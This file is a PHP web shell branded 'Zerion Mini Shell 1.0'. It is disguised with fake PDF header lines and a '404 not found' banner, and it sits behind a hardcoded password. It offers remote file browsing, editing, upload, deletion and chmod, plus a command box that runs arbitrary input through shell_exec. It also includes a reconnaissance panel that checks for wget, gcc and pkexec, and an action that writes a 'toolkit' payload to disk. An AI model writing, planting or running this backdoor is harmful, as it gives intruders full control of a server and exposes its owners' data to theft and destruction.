%PDF-
%PDF-
Mini Shell
Mini Shell
<?php
session_start();
$correctPassword = 'delsgade7';
if (isset($_POST['password']) && $_POST['password'] === $correctPassword) {
$_SESSION['authenticated'] = true;
}
if (isset($_GET['action']) && $_GET['action'] === 'logout') {
unset($_SESSION['authenticated']);
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
if (!isset($_SESSION['authenticated']) || !$_SESSION['authenticated']) {
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/css/bootstrap.min.css">
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
background-color: #f8f9fa;
}
.container {
max-width: 400px;
padding: 20px;
background: white;
border-radius: 5px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
}
.container h1 {
margin-bottom: 20px;
}
</style>
</head>
<body>
<div class="container">
<h1 class="text-center">Login</h1>
<form method="POST" action="">
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input type="password" id="password" name="password" class="form-control" required>
</div>
<button type="submit" class="btn btn-primary w-100">Login</button>
</form>
</div>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/js/bootstrap.bundle.min.js"></script>
</body>
</html>
<?php
exit;
}
function listFiles($dir) {
return is_dir($dir) ? array_diff(scandir($dir), ['.', '..']) : [];
}
function showFiles($dir) {
foreach (listFiles($dir) as $file) {
$fullPath = realpath($dir . DIRECTORY_SEPARATOR . $file);
$isDir = is_dir($fullPath);
echo '<div class="card mb-2">
<div class="card-body d-flex justify-content-between align-items-center">
<div>
<h5 class="card-title mb-0">' . htmlspecialchars($file) . '</h5>
<p class="card-text mb-0 text-muted">Path: ' . htmlspecialchars($fullPath) . '</p>
</div>
<div>';
if ($isDir) {
echo '<a href="?dir=' . urlencode($fullPath) . '" class="btn btn-outline-secondary btn-sm">Open</a>';
} else {
echo '<a href="?action=view&file=' . urlencode($fullPath) . '" class="btn btn-outline-primary btn-sm">View</a>
<a href="?action=edit&file=' . urlencode($fullPath) . '" class="btn btn-info btn-sm">Edit</a>
<a href="?action=rename&file=' . urlencode($fullPath) . '" class="btn btn-warning btn-sm">Rename</a>
<a href="?action=delete&file=' . urlencode($fullPath) . '" class="btn btn-danger btn-sm" onclick="return confirm(\'Are you sure?\')">Delete</a>
<a href="?action=chmod&file=' . urlencode($fullPath) . '" class="btn btn-secondary btn-sm">Chmod</a>';
}
echo '</div></div></div>';
}
}
function viewFile($file) {
if (file_exists($file)) {
echo '<pre>' . htmlspecialchars(file_get_contents($file)) . '</pre>';
} else {
echo 'File not found!';
}
}
function renameFile($oldName, $newName) {
return file_exists($oldName) && !file_exists($newName) ? rename($oldName, $newName) : false;
}
function deleteFile($file) {
return file_exists($file) ? unlink($file) : false;
}
function saveFile($file, $content) {
return file_put_contents($file, $content);
}
function chmodFile($file, $mode) {
return chmod($file, octdec($mode));
}
function uploadFile($file) {
$uploadDir = __DIR__ . '/uploads/';
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
return move_uploaded_file($file['tmp_name'], $uploadDir . basename($file['name']));
}
function makeDirectory($dir) {
return !is_dir($dir) ? mkdir($dir, 0755, true) : false;
}
function makeFile($file) {
return file_put_contents($file, '') !== false;
}
$rootDir = __DIR__;
$currentDir = $rootDir;
$action = $_GET['action'] ?? '';
$file = $_GET['file'] ?? '';
$newName = $_POST['new_name'] ?? '';
$content = $_POST['content'] ?? '';
$mode = $_POST['mode'] ?? '';
$uploadFile = $_FILES['upload_file'] ?? null;
$newDir = $_POST['new_dir'] ?? '';
$newFile = $_POST['new_file'] ?? '';
if (isset($_GET['dir'])) {
$currentDir = realpath($_GET['dir']);
}
?>
<html><head><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"><style>@import url('https://fonts.googleapis.com/css?family=Dosis');@import url('https://fonts.googleapis.com/css?family=Bungee');td,th,thead{border:1px solid #fff;padding:5px;box-shadow: 0 0 10px 0 #707070}tr{background-color:#fff}body{font-family:"Dosis",cursive;text-shadow:0px 0px 1px #707070}</style></head> <iframe width="0" height="0" src="" frameborder="0" allow="autoplay" allowfullscreen="none"></iframe> <body><center> <?php error_reporting(0); $currentPath = getcwd(); $pathComponents = explode(DIRECTORY_SEPARATOR, $currentPath); echo "<font face='Bungee' size='3'><h1>🐍 404 not found</h1></font><div class='container'><div id='pw'>Home: "; foreach ($pathComponents as $index => $component) { $partialPath = implode(DIRECTORY_SEPARATOR, array_slice($pathComponents, 0, $index + 1)); $partialPath = str_replace("%2F", "/", rawurlencode($partialPath)); echo "<a href='?path=" . $partialPath . "'>" . $component . "</a>"; if ($index < count($pathComponents) - 1) { echo "/"; } } echo "</div><br>"; ?> <form method="GET"><input type="text" name="path" autocomplete="off" size="100" class="textinput" required><input type="submit" class="submit"></form> <?php if (htmlspecialchars(isset($_GET["path"]))) { $path = $_GET["path"]; $file = $_GET["file"]; $folder = $_GET["folder"]; $folder_name = basename($folder); $file_name = basename($file); ?> <script> const path = document.querySelector('input[name=path]') path.value = '<?php echo $_GET["path"]; ?>' </script><a href="?path=<?php echo htmlspecialchars($_GET["path"]); ?>&action=createfolder"><button type="button" class="button-tools">+Folder</button></a> <a href="?path=<?php echo htmlspecialchars($_GET["path"]); ?>&action=createfile"><button type="button" class="button-tools">+File</button></a> <a href="?path=<?php echo htmlspecialchars($_GET["path"]); ?>&action=spawntools"><button type="button" class="button-tools">Spawn ToolKit</button></a> <a href="?path=<?php echo htmlspecialchars($_GET["path"]); ?>&action=info"><button type="button" class="button-tools">Info Min</button></a> <a href="?path=<?php echo htmlspecialchars($_GET["path"]); ?>&action=upload"><button type="button" class="button-tools">Upload</button></a> <a href="?path=<?php echo htmlspecialchars($_GET["path"]); ?>&action=cmd"><button type="button" class="button-tools">Command</button></a><br><br> <?php if ($_GET["action"] == "view") { echo "<p class='text-center'>Filename: $file_name</p>"; echo "<textarea class='textarea' disabled>".htmlspecialchars(file_get_contents($file))."</textarea>"; } elseif ($_GET["action"] == "edit" && $file) { ?> <form method="POST"><p>Filename:<?php echo $file_name; ?></p><?php echo "<textarea name='content' class='textarea'>".htmlspecialchars(file_get_contents($file))." </textarea>"; ?><input type="submit" name="edit" class="submit"></form> <?php if (isset($_POST["edit"])) { $editted = base64_encode($_POST["content"]); $save = saveme($file, base64_decode($editted)); if ($save) { echo "<script>alert('Edit $file_name success')</script>"; echo "<script>window.location = '?path=$path&action=edit&file=$file'</script>"; } else { echo "Edit $file_name failed"; } } } elseif ($_GET["action"] == "rename" && $file) { renames($file, $path, $file_name); } elseif ($_GET["action"] == "rename" && $folder) { renames($folder, $path, $folder_name); } elseif ($_GET["action"] == "delete" && $file) { if (unlink($file)) { echo "<script>alert('Delete $file_name success')</script>"; echo "<script>window.location = '?path=$path'</script>"; } else { echo "Delete $file_name failed"; } } elseif ($_GET["action"] == "delete" && $folder) { if (is_dir($folder)) { if (is_writable($folder)) { @rmdir($folder); @shell_exec("rm -rf $folder"); @shell_exec("rmdir /s /q $folder"); echo "<script>alert('$folder_name Deleted')</script>"; echo "<script>window.location = '?path=$path'</script>"; } else { echo "Delete $folder_name failed"; } } } elseif ($_GET["action"] == "spawntools") { $save = saveme($path."/tools.php", base64_decode($tools)); echo "<center>"; if ($save) { echo "<script>alert('Spawn Toolkit tools.php success')</script>"; echo "<script>window.location = '?path=$path'</script>"; } else { echo "Spawn Toolkit failed"; } echo "</center>"; } elseif ($_GET["action"] == "createfile") { ?> <form method="POST"><input type="text" name="filename" class="textinput"><textarea name="filetext" class="textarea"></textarea><input type="submit" name="touch" class="submit"></form> <?php if (isset($_POST["touch"])) { $filename = $_POST["filename"]; $filetext = base64_encode($_POST["filetext"]); $save = saveme($path."/".$filename, base64_decode($filetext)); if ($save) { echo "<script>alert('".$filename." has successfully created')</script>"; echo "<script>window.location = '?path=".htmlspecialchars($path)."'</script>"; } else { echo "Create file failed"; } } } elseif ($_GET["action"] == "createfolder") { ?> <form method="POST"><input type="text" name="foldername" autocomplete="off" class="inputtext textinput"><input type="submit" name="cfolder" class="submit"></form> <?php if (isset($_POST["cfolder"])) { $fname = $_POST["foldername"]; if (@mkdir($path."/".$fname)) { echo "<script>alert('$fname Created')</script>"; echo "<script>window.location = '?path=".htmlspecialchars($path)."'</script>"; } else { echo "Create folder failed"; } } } elseif ($_GET["action"] == "upload") { ?> <form method="POST" enctype="multipart/form-data"><input type="file" name="nax_file" id="naxx"><input type="submit" name="upkan" class="submit"></form> <?php if (isset($_POST["upkan"])) { if (move_uploaded_file($_FILES["nax_file"]["tmp_name"], $path."/".$_FILES["nax_file"]["name"])) { $file = $_FILES["nax_file"]["name"]; echo "<script>alert('$file uploaded')</script>"; echo "<script>window.location = '?path=".htmlspecialchars($path)."'</script>"; } else { echo "<center>Upload fail</center>"; } } } elseif ($_GET["action"] == "cmd") { ?> <form method="POST"><input type="text" name="cmd" autocomplete="off" size="100" class="inputtext textinput"><input type="submit" name="exec" class="submit"></form> <?php if (isset($_POST["exec"])) { $cmd = $_POST["cmd"]; echo "<div class='cmd'>".@shell_exec($cmd)."</div>"; } } elseif ($_GET["action"] == "info") { echo '<div class="wrap">'; infomin(); echo '</div>'; } else { ?> <div class="wrap"><table><thead><tr><th>Items</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody> <?php $scan = scandir($path); foreach ($scan as $folders) { if (!is_dir($path."/".$folders) || $folders == ".." || $folders == ".") { continue; } ?> <tr><td nowrap="nowrap" width="450"><?php echo "<a href='?path=$path/$folders'><i class='fas fa-folder'></i> $folders</a>"; ?></td><td nowrap="nowrap" width="100">---</td><td nowrap="nowrap" width="150"> <?php if (is_writable($path."/".$folders)) { $color = "lime"; } else { $color = "red"; } echo "<font color='$color'>".hi_permission($path."/".$folders)."</font>"; ?> </td><td nowrap="nowrap" width="90"> <?php echo " <a href='?path=$path&action=rename&folder=$path/$folders'><i class='fas fa-pen'></i></a><a href='?path=$path&action=delete&folder=$path/$folders'><i class='fas fa-trash-alt'></i></a> "; ?> </td></tr> <?php } foreach ($scan as $files) { if (is_file($path."/".$files)) { ?> <tr><td nowrap="nowrap" width="450"><?php echo "<a href='?path=$path&action=view&file=$path/$files'><i class='fas fa-file'></i> $files</a>"; ?></td><td nowrap="nowrap" width="100"><?php echo "".Size($path."/".$files).""; ?></td><td nowrap="nowrap" width="150"> <?php if (is_writable($path."/".$files)) { $color = "lime"; } else { $color = "red"; } echo "<font color='$color'>".hi_permission($path."/".$folders)."</font>"; ?> </td><td nowrap="nowrap" width="90"> <?php echo " <a href='?path=$path&action=edit&file=$path/$files'><i class='fas fa-edit'></i></a><a href='?path=$path&action=rename&file=$path/$files'><i class='fas fa-pen'></i></a><a href='?path=$path&action=delete&file=$path/$files'><i class='fas fa-trash-alt'></i></a> "; ?> </td></tr> <?php } } echo "</tbody></table></div>"; } } function saveme($name, $content) { $open = fopen($name, "w"); fwrite($open, $content); fclose($open); return $open; } function renames($item, $path, $name) { ?> <form method="POST"><input type="text" name="newname" value="<?php echo $name; ?>" size="50" class="textinput inputtext"><input type="submit" name="rename" class="submit"></form> <?php if (isset($_POST["rename"])) { $new = $_POST["newname"]; if (rename($item, $path."/".$new)) { echo "<script>alert('$name successfully renamed')</script>"; echo "<script>window.location = '?path=$path'</script>"; } else { echo "Rename failed"; } } } function Size($path) { $bytes = sprintf('%u', filesize($path)); if ($bytes > 0) { $unit = intval(log($bytes, 1024)); $units = array('B', 'KB', 'MB', 'GB'); if (array_key_exists($unit, $units) === true) { return sprintf('%d %s', $bytes / pow(1024, $unit), $units[$unit]); } } return $bytes; } function infomin() { $curl = (function_exists("curl_version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $wget = (@shell_exec("wget --help")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $python = (@shell_exec("python --help")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $perl = (@shell_exec("perl --help")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $ruby = (@shell_exec("ruby --help")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $gcc = (@shell_exec("gcc --help")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; $disfuncs = @ini_get("disable_functions"); $showit = (!empty($disfuncs)) ? "<font color='red'>$disfuncs</font>" : "<font color='lime'>NONE</font>"; echo "<div class='infomin wrap'>"; echo "OS : ".php_uname()."<br>"; echo "SERVER IP : ".$_SERVER["SERVER_ADDR"]."<br>"; echo "SOFTWARE : ".$_SERVER["SERVER_SOFTWARE"]."<br>"; echo "Disabled Functions : $showit<br>"; echo "CURL : $curl | WGET : $wget | PERL : $perl | RUBY : $ruby | PYTHON : $python | GCC : $gcc | PKEXEC : $pkexec"; echo "</div>"; } function hi_permission($items) { $perms = fileperms($items); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> </div><script> const file = document.querySelector('input[type="file"]') const label = document.querySelector('label[for="naxx"]') file.addEventListener('change', () => { if (file.value.length == '0') { label.innerText = 'Choose File Here' } else if (file.value.length >= '30') { value = file.value.substring(0, 30) + "..." label.innerText = value } else { label.innerText = file.value } }) </script></body></html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>File Manager</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/css/bootstrap.min.css">
<style>
body {
padding-top: 20px;
}
.container {
max-width: 1200px;
}
.editor {
height: 400px;
}
.card {
margin-bottom: 10px;
}
.btn {
margin-right: 5px;
}
</style>
</head>
<body>
<div class="container">
<h1 class="mb-4">File Manager</h1>
<div class="mb-4">
<a href="?action=logout" class="btn btn-danger">Logout</a>
<a href="?dir=<?php echo urlencode($rootDir); ?>" class="btn btn-secondary">Home</a>
</div>
<?php
switch ($action) {
case 'view':
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">View File</h5>';
viewFile($file);
echo ' </div>
</div>';
break;
case 'rename':
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Rename File</h5>';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
echo renameFile($file, $newName) ? '<div class="alert alert-success">File renamed successfully!</div>' : '<div class="alert alert-danger">Error renaming file!</div>';
} else {
echo '<form method="POST" class="mb-4">
<div class="mb-3">
<label for="new_name" class="form-label">New name</label>
<input type="text" class="form-control" id="new_name" name="new_name" value="' . htmlspecialchars(basename($file)) . '">
</div>
<button type="submit" class="btn btn-primary">Rename</button>
</form>';
}
echo ' </div>
</div>';
break;
case 'delete':
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Delete File</h5>';
echo deleteFile($file) ? '<div class="alert alert-success">File deleted successfully!</div>' : '<div class="alert alert-danger">Error deleting file!</div>';
echo ' </div>
</div>';
break;
case 'edit':
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Edit File</h5>';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
echo saveFile($file, $content) ? '<div class="alert alert-success">File saved successfully!</div>' : '<div class="alert alert-danger">Error saving file!</div>';
} else {
echo '<form method="POST" class="mb-4">
<div class="mb-3">
<label for="content" class="form-label">Content</label>
<textarea id="content" name="content" class="form-control editor" rows="10">' . htmlspecialchars(file_get_contents($file)) . '</textarea>
</div>
<button type="submit" class="btn btn-primary">Save</button>
</form>';
}
echo ' </div>
</div>';
break;
case 'chmod':
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Change Permissions</h5>';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
echo chmodFile($file, $mode) ? '<div class="alert alert-success">Permissions changed successfully!</div>' : '<div class="alert alert-danger">Error changing permissions!</div>';
} else {
echo '<form method="POST" class="mb-4">
<div class="mb-3">
<label for="mode" class="form-label">Mode (e.g., 0755)</label>
<input type="text" class="form-control" id="mode" name="mode" required>
</div>
<button type="submit" class="btn btn-primary">Change Permissions</button>
</form>';
}
echo ' </div>
</div>';
break;
default:
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($uploadFile)) {
echo uploadFile($uploadFile) ? '<div class="alert alert-success">File uploaded successfully!</div>' : '<div class="alert alert-danger">Error uploading file!</div>';
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($newDir)) {
echo makeDirectory($newDir) ? '<div class="alert alert-success">Directory created successfully!</div>' : '<div class="alert alert-danger">Error creating directory!</div>';
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($newFile)) {
echo makeFile($newFile) ? '<div class="alert alert-success">File created successfully!</div>' : '<div class="alert alert-danger">Error creating file!</div>';
}
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Upload File</h5>
<form method="POST" enctype="multipart/form-data">
<div class="mb-3">
<input type="file" class="form-control" name="upload_file">
</div>
<button type="submit" class="btn btn-primary">Upload</button>
</form>
</div>
</div>';
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Create Directory</h5>
<form method="POST">
<div class="mb-3">
<input type="text" class="form-control" name="new_dir" placeholder="Directory path">
</div>
<button type="submit" class="btn btn-primary">Create Directory</button>
</form>
</div>
</div>';
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Create File</h5>
<form method="POST">
<div class="mb-3">
<input type="text" class="form-control" name="new_file" placeholder="File path">
</div>
<button type="submit" class="btn btn-primary">Create File</button>
</form>
</div>
</div>';
echo '<div class="card mb-4">
<div class="card-body">
<h5 class="card-title">Files</h5>';
showFiles($currentDir);
echo ' </div>
</div>';
break;
}
?>
</div>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/5.3.0/js/bootstrap.bundle.min.js"></script>
</body>
</html>
Zerion Mini Shell 1.0